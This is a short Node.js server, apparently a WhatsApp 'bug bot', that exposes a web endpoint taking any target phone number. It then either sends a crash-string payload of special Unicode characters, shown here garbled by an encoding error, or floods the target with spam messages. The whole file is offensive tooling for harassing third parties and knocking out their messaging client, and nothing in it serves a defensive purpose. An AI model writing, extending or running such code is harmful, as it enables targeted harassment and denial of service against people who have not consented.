const express = require('express');
const { Client, LocalAuth } = require('whatsapp-web.js');
const qrcode = require('qrcode-terminal');
const app = express();
const port = process.env.PORT || 3000;

let client = null;
let isReady = false;

function initBot() {
    client = new Client({
        authStrategy: new LocalAuth(),
        puppeteer: { headless: true, args: ['--no-sandbox'] }
    });

    client.on('qr', qr => qrcode.generate(qr, { small: true }));
    client.on('ready', () => { isReady = true; console.log('Bot ready'); });
    client.initialize();
}

app.use(express.static(__dirname));
app.get('/sendbug', async (req, res) => {
    const target = req.query.target;
    const bugType = req.query.type;
    
    if (!target || !isReady) {
        return res.json({ success: false, error: 'Bot belum siap' });
    }
    
    const chatId = target.includes('@c.us') ? target : `${target}@c.us`;
    
    try {
        if (bugType === 'crash') {
            await client.sendMessage(chatId, 'ğ“€€ğ“€ğ“€‚ğ“€ƒğ“€„ğ“€…ğ“€†ğ“€‡ğ“€ˆğ“€‰ğ“€Šğ“€‹ğ“€Œğ“€ğ“€ğ“€');
            res.json({ success: true, message: 'Crash bug terkirim' });
        } else if (bugType === 'flood') {
            for (let i = 0; i < 20; i++) {
                await client.sendMessage(chatId, `FLOOD_${i}`);
                await new Promise(r => setTimeout(r, 300));
            }
            res.json({ success: true, message: 'Flood terkirim' });
        }
    } catch (err) {
        res.json({ success: false, error: err.message });
    }
});

app.listen(port, () => {
    console.log(`Server jalan di port ${port}`);
    initBot();
});
